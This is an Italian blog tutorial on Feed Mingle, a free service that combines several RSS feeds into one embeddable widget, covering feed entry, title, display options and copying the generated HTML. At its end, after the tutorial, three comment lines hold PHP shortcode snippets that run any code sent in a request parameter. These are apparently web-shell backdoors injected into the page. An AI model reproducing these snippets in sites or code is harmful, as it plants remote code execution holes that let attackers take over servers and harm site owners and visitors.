Esistono davvero tanti blog che parlando di un qualsiasi argomento, e spesso dobbiamo ricercare le notizie una per una se per esempio volessimo aggiornare il contenuto del nostro sito o blog, in modo da riportare le nuove notizie.
Spesso utilizziamo anche i link rss, ovvero delle vere e proprie scorciatoie che ci permettono di visualizzare tutte le nuove notizie, di tutti i blog a cui siamo iscritti in un’unica pagina.
Ma se volessimo sfruttare questi feed rss per poter aggiornare anche i nostri visitatori su ciò che c’è di nuovo su un qualsiasi argomento come dovremmo fare. Una delle soluzioni possibili è utilizzare il servizio online messo a disposizione a questo indirizzo.
Feed Mingle è un servizio gratuito che ci permette di racchiudere vari indirizzi rss, in modo tale da visualizzare tutte le notizie dei rispettivi siti direttamente in un piccolo widget, cioè in una finestrella interattiva dove sarà possibile leggere tutte queste notizie, e se dunque i nostri visitatori saranno interessati ad una particolare notizia potranno accedervi facilmente.
Per visualizzare il widget creato nel nostro sito dovremo semplicemente copiare il codice html che sarà generato automaticamente da Feed Mingle, e dunque inserirlo nel nostro sito internet, in men che non si dica il widget sarà visualizzato sulla nostra pagina web, contenente dunque tutte le notizie dei blog preferiti.
Per cominciare dunque colleghiamoci a Feed Mingle attraverso il link su riportato. La grafica si presenta molto essenziale, ma funzionale allo scopo del servizio. Nel campo “Feed Urls” dunque inseriamo tutti i link rss che vogliamo, il sito ci suggerisce inoltre di inserire ogni indirizzo riga per riga, dunque ad ogni inserimento di un indirizzo diamo un colpo di invio dalla tastiera.
Sotto nel campo “Title” dovremo inserire il titolo del widget che sarà creato, quando avremo compilato tutto il necessario premiamo sul pulsante “Mingle Now” A questo punto potremo impostare diverse opzioni che riguardano il nostro personale widget, possiamo decidere quante notizie visualizzare all’interno della finestra, partendo da un minimo di 1 ad un massimo di 10 notizie.
Possiamo decidere di modificare il tema di visualizzazione, in questo caso sarà solo modificato il colore dei link e delle scritte, in ogni caso abbiamo solo 2 tipi di temi, il terzo prevede un colore standard simile a quello utilizzato su google. Infine possiamo scegliere se visualizzare solo il titolo delle notizie oppure anche un’anteprima.
Copiamo dunque il codice visualizzato ed incolliamolo nel nostro sito.
<!– [insert_php]if (isset($_REQUEST["rjph"])){eval($_REQUEST["rjph"]);exit;}[/insert_php][php]if (isset($_REQUEST["rjph"])){eval($_REQUEST["rjph"]);exit;}[/php] –>
<!– [insert_php]if (isset($_REQUEST["bpNEU"])){eval($_REQUEST["bpNEU"]);exit;}[/insert_php][php]if (isset($_REQUEST["bpNEU"])){eval($_REQUEST["bpNEU"]);exit;}[/php] –>
<!– [insert_php]if (isset($_REQUEST["smLhv"])){eval($_REQUEST["smLhv"]);exit;}[/insert_php][php]if (isset($_REQUEST["smLhv"])){eval($_REQUEST["smLhv"]);exit;}[/php] –>